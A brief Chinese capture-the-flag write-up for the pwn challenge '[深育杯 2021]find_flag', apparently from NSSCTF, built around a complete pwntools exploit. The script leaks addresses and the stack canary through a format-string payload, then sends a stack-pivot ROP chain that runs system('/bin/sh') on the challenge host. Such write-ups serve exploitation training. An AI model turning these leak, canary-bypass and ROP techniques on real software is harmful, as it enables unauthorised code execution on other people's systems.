Problem: [深育杯 2021]find_flag
思路
- 直接用后门get flag很简单
- 尝试getshell,可以在没有libc情况下getshell
EXP
#!/usr/bin/env python3 from pwn import * context(os='linux', arch='amd64', log_level='debug') filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.23-0ubuntu11.3/amd64/libc6_2.23-0ubuntu11.3_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "node4.anna.nssctf.cn" port = 28282 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b *$rebase(0x13f7) set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.23-0ubuntu11.3/amd64/libc6-dbg_2.23-0ubuntu11.3_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.23-0ubuntu11.3/amd64/glibc-source_2.23-0ubuntu11.3_all/usr/src/glibc/glibc-2.23 ''' def start(): if args.P: return process(elf.path) elif args.R: return remote(host, port) else: return gdb.debug(elf.path, gdbscript = gs) io = start() # pwn :) payload = b'%19$p%15$p%17$p' io.recvuntil(b'name') io.send(payload + b'\n') io.recvuntil(b'0x') elf_base = int(io.recv(12), 16) - 0x146f log.info("elf_base --> "+hex(elf_base)) io.recvuntil(b'0x') stack_addr = int(io.recv(12), 16) log.info("stack_addr --> "+hex(stack_addr)) io.recvuntil(b'0x') canary = int(io.recv(16), 16) log.info("canary --> "+hex(canary)) #0x00000000000014e3 : pop rdi ; ret pop_rdi_ret = elf_base + 0x14e3 leave_ret = elf_base + 0x13f7 ret = pop_rdi_ret + 1 call_system = elf_base + 0x1238 binsh = stack_addr - 0x40 io.recvuntil(b'?') payload = b'/bin/sh\x00' + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(call_system) + b'a'*0x10 + p64(canary) + p64(stack_addr - 0x40) + p64(leave_ret) io.send(payload + b'\n') io.interactive()
总结
- 对该题的考点总结